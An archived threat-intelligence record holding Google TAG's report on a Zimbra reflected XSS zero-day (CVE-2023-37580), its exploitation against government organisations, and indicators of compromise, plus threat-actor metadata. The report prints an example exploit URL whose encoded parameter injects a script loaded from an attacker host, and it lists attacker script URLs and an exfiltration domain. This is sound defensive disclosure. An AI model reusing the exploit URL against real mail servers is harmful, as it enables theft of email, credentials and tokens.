{
	"id": "915a3a78-55b2-4405-a31e-a32348768b41",
	"created_at": "2026-04-06T00:10:27.309536Z",
	"updated_at": "2026-04-10T03:30:21.376826Z",
	"deleted_at": null,
	"sha1_hash": "8ad7f86bd03647b6fbcc235828f1d796061bdb98",
	"title": "Zimbra 0-day used to target international government organizations",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 180811,
	"plain_text": "Zimbra 0-day used to target international government organizations\nBy Clement Lecigne\nPublished: 2023-11-16 · Archived: 2026-04-05 22:29:29 UTC\nNov 16, 2023\n4 min read\nC\nClement Lecigne\nThreat Analysis Group\nM\nMaddie Stone\nThreat Analysis Group\nIn June 2023, Google’s Threat Analysis Group (TAG) discovered an in-the-wild 0-day exploit targeting Zimbra\nCollaboration, an email server many organizations use to host their email. Since discovering the 0-day, now patched as\nCVE-2023-37580, TAG has observed four different groups exploiting the same bug to steal email data, user credentials, and\nauthentication tokens. Most of this activity occurred after the initial fix became public on Github. To ensure protection\nagainst these types of exploits, TAG urges users and organizations to keep software fully up-to-date and apply security\nupdates as soon as they become available.\n0-day discovery, hotfix and patch\nTAG first discovered the 0-day, a reflected cross-site scripting (XSS) vulnerability, in June when it was actively exploited in\ntargeted attacks against Zimbra’s email server. Zimbra pushed a hotfix to their public Github on July 5, 2023 and published\nan initial advisory with remediation guidance on July 13, 2023. They patched the vulnerability as CVE-2023-37580 on July\n25, 2023.\nTAG observed three threat groups exploiting the vulnerability prior to the release of the official patch, including groups that\nmay have learned about the bug after the fix was initially made public on Github. TAG discovered a fourth campaign using\nthe XSS vulnerability after the official patch was released. Three of these campaigns began after the hotfix was initially\nmade public highlighting the importance of organizations applying fixes as quickly as possible.\nThe Vulnerability CVE-2023-37580\nCVE-2023-37580 is a reflected cross-site scripting (XSS) vulnerability. XSS is a web application vulnerability that allows\nmalicious scripts to be injected into another website. In this case, there was a vulnerability in Zimbra that injected the\nparameter within the URL directly into the webpage, causing the script to be executed. An example that could trigger the\nXSS is:\nhttps://mail.REDACTED[.]com/m/momovetost=acg%22%2F%3E%3Cscript%20src%3D%22https%3A%2F%2Fobsorth%2Eopwtjnpoc%2Eml%2FpQyM\nwhich decodes to:\nhttps://mail.REDACTED[.]com/m/momoveto?st=acg\"/\u003e //\nThe fix was to escape the contents of the st parameter before it was set as the value in an html object.\nCampaign 1: First known exploitation leads to email-stealing framework\nThe initial in-the-wild discovery of the 0-day vulnerability was a campaign targeting a government organization in Greece.\nThe attackers sent emails containing exploit urls to their targets. If a target clicked the link during a logged-in Zimbra\nhttps://blog.google/threat-analysis-group/zimbra-0-day-used-to-target-international-government-organizations/\nPage 1 of 2\n\nsession, the url loaded the same framework that Volexity documented in February 2022. This framework uses the XSS to\r\nsteal users’ mail data, such as emails and attachments and to set up an auto-forwarding rule to an attacker-controlled email\r\naddress. The framework was loaded from:\r\nhttps://obsorth.opwtjnpoc[.]ml/pQyMSCXWyBWJpIos.js\r\nCampaign 2: Winter Vivern exploitation after hotfix pushed to Github\r\nThe patch for the vulnerability was pushed to Github on July 5. Another actor exploited the vulnerability for a full two\r\nweeks beginning on July 11 before the official patch became available on July 25. TAG identified multiple exploit urls that\r\ntargeted government organizations in Moldova and Tunisia; each url contained a unique official email address for specific\r\norganizations in those governments. TAG attributes this activity to Winter Vivern (UNC4907), an APT group known to\r\nexploit XSS in Zimbra and Roundcube. The vulnerability was used to load scripts at:\r\nhttps://applicationdevsoc[.]com/zimbraMalwareDefender/zimbraDefender.js\r\nhttps://applicationdevsoc[.]com/tndgt/auth.js\r\nCampaign 3: Exploit used for credential phishing\r\nDays before Zimbra pushed their official patch on July 25, TAG observed a third, unidentified group exploiting the\r\nvulnerability as part of a campaign that phished for credentials belonging to a government organization in Vietnam. In this\r\ncase, the exploit url pointed to a script that displayed a phishing page for users’ webmail credentials and posted stolen\r\ncredentials to a url hosted on an official government domain that the attackers likely compromised.\r\nCampaign 4: N-day exploit used for stealing authentication token\r\nIn August 2023, after the patch for CVE-2023-37580 was released, TAG discovered a fourth campaign using the\r\nvulnerability against a government organization in Pakistan. The exploit was used to steal the Zimbra authentication token.\r\nThe token was exfiltrated to ntcpk[.]org.\r\nConclusion\r\nThe discovery of at least four campaigns exploiting CVE-2023-37580, three campaigns after the bug first became public,\r\ndemonstrates the importance of organizations applying fixes to their mail servers as soon as possible. These campaigns also\r\nhighlight how attackers monitor open-source repositories to opportunistically exploit vulnerabilities where the fix is in the\r\nrepository, but not yet released to users. The actors behind Campaign #2 began exploiting the bug after the fix was pushed to\r\nGithub, but before Zimbra publicly released the advisory with remediation advice.\r\nThe exploitation of CVE-2023-37580 comes on the heels of CVE-2022-24682, another reflected XSS vulnerability in\r\nZimbra mail servers that was actively exploited in-the-wild in 2022 and is followed by the exploitation of CVE-2023-5631,\r\na XSS vulnerability in Roundcube mail servers just this past month. The regular exploitation of XSS vulnerabilities in mail\r\nservers also shows a need for further code auditing of these applications, especially for XSS vulnerabilities.\r\nWe’d like to acknowledge Zimbra for their response and patching of this vulnerability. Following our disclosure policy, TAG\r\nshares its research to raise awareness and advance security across the ecosystem. We also add all identified websites and\r\ndomains to Safe Browsing to safeguard users from further exploitation. We urge users and organizations to apply patches\r\nquickly and keep software fully up-to-date for their protection. TAG will remain focused on detecting, analyzing, and\r\npreventing 0-day exploitation as well as reporting vulnerabilities to vendors immediately upon discovery.\r\nIndicators of compromise (IoCs)\r\nhttps://obsorth.opwtjnpoc[.]ml/pQyMSCXWyBWJpIos.js\r\nhttps://applicationdevsoc[.]com/zimbraMalwareDefender/zimbraDefender.js\r\nhttps://applicationdevsoc[.]com/tndgt/auth.js\r\nntcpk[.]org\r\nThanks to TAG's Kristen Dennesen who also contributed to this report.\r\nRelated stories\r\n.\r\nSource: https://blog.google/threat-analysis-group/zimbra-0-day-used-to-target-international-government-organizations/\r\nhttps://blog.google/threat-analysis-group/zimbra-0-day-used-to-target-international-government-organizations/\r\nPage 2 of 2",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://blog.google/threat-analysis-group/zimbra-0-day-used-to-target-international-government-organizations/"
	],
	"report_names": [
		"zimbra-0-day-used-to-target-international-government-organizations"
	],
	"threat_actors": [
		{
			"id": "23226bab-4c84-4c65-a8d1-7ac10c44b172",
			"created_at": "2023-04-27T02:04:45.463683Z",
			"updated_at": "2026-04-10T02:00:04.980143Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"TA473",
				"TAG-70",
				"UAC-0114",
				"UNC4907"
			],
			"source_name": "ETDA:Winter Vivern",
			"tools": [
				"APERETIF"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e6704f3c-15d7-4e1d-b5a8-e33e7e9bd925",
			"created_at": "2023-11-04T02:00:07.660461Z",
			"updated_at": "2026-04-10T02:00:03.385093Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"TA-473",
				"UAC-0114",
				"TA473",
				"TAG-70"
			],
			"source_name": "MISPGALAXY:Winter Vivern",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a20598c1-894c-4173-be6e-64a1ce9732bd",
			"created_at": "2024-11-01T02:00:52.652891Z",
			"updated_at": "2026-04-10T02:00:05.375678Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"Winter Vivern",
				"TA473",
				"UAC-0114"
			],
			"source_name": "MITRE:Winter Vivern",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434227,
	"ts_updated_at": 1775791821,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8ad7f86bd03647b6fbcc235828f1d796061bdb98.pdf",
		"text": "https://archive.orkl.eu/8ad7f86bd03647b6fbcc235828f1d796061bdb98.txt",
		"img": "https://archive.orkl.eu/8ad7f86bd03647b6fbcc235828f1d796061bdb98.jpg"
	}
}